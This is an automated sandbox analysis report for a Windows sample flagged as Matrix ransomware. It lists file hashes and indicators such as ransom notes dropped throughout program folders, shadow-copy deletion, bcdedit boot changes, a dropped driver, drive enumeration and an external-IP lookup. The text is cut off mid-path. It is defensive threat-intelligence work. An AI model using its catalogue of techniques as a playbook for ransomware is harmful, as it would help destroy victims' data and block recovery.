Analysis
-
max time kernel
150s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
06-03-2022 01:11
Static task
static1
Behavioral task
behavioral1
Sample
2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe
Resource
win10v2004-en-20220113
General
-
Target
2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe
-
Size
2.6MB
-
MD5
5cd0f0314c70799026ac841652a7ee07
-
SHA1
f5420dc1b2f29e91c24345d02e190374ff3f3480
-
SHA256
2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21
-
SHA512
f98809bd7166dd0284b8b40dee27d8ab1b284d609a124414c44a6624d2a6c1df0379721db896288b7f64170c02b5834ab4ee23866a66454522dee342096b4316
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-gb\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\css\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fi-fi\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Users\Admin\Music\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-tw\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Microsoft Office\root\Office16\SAMPLES\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Java\jre1.8.0_66\bin\server\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Microsoft Office\root\Office16\3082\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Microsoft\Edge\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\97.0.1072.55\Extensions\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1096 bcdedit.exe 3576 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 144 2324 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS W5h2OkrD64.exe -
Executes dropped EXE 3 IoCs
pid Process 1424 NWCHJTo1.exe 784 W5h2OkrD.exe 2188 W5h2OkrD64.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000400000001e8ba-147.dat upx behavioral2/files/0x000400000001e8ba-148.dat upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation wscript.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3376 takeown.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\F: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\S: W5h2OkrD64.exe File opened (read-only) \??\K: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\W: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\R: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\N: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\B: W5h2OkrD64.exe File opened (read-only) \??\G: W5h2OkrD64.exe File opened (read-only) \??\J: W5h2OkrD64.exe File opened (read-only) \??\L: W5h2OkrD64.exe File opened (read-only) \??\Z: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\R: W5h2OkrD64.exe File opened (read-only) \??\G: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\E: W5h2OkrD64.exe File opened (read-only) \??\M: W5h2OkrD64.exe File opened (read-only) \??\V: W5h2OkrD64.exe File opened (read-only) \??\V: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\O: W5h2OkrD64.exe File opened (read-only) \??\T: W5h2OkrD64.exe File opened (read-only) \??\X: W5h2OkrD64.exe File opened (read-only) \??\I: W5h2OkrD64.exe File opened (read-only) \??\S: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\L: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\H: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\A: W5h2OkrD64.exe File opened (read-only) \??\H: W5h2OkrD64.exe File opened (read-only) \??\N: W5h2OkrD64.exe File opened (read-only) \??\X: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\M: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\I: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\Z: W5h2OkrD64.exe File opened (read-only) \??\O: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\U: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\Q: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\P: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\F: W5h2OkrD64.exe File opened (read-only) \??\P: W5h2OkrD64.exe File opened (read-only) \??\W: W5h2OkrD64.exe File opened (read-only) \??\Y: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\E: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened (read-only) \??\K: W5h2OkrD64.exe File opened (read-only) \??\Q: W5h2OkrD64.exe File opened (read-only) \??\U: W5h2OkrD64.exe File opened (read-only) \??\Y: W5h2OkrD64.exe File opened (read-only) \??\T: 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 143 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\IUnUu6qd.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable-dark.png 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Microsoft Office\root\Office16\FPA_w1\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\strings.resjson 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-tool-view.js 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTrial-ul-oob.xrm-ms 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\office.x-none.msi.16.x-none.tree.dat 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART8.BDR 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Grace-ppd.xrm-ms 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ppd.xrm-ms 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\WT61ES.LEX 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-ul-oob.xrm-ms 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\as80.xsl 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\ui-strings.js 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\ui-strings.js 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Edge.dat.DATA 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-fr\ui-strings.js 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\info.png 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\ui-strings.js 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_OEM_Perp-ppd.xrm-ms 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files 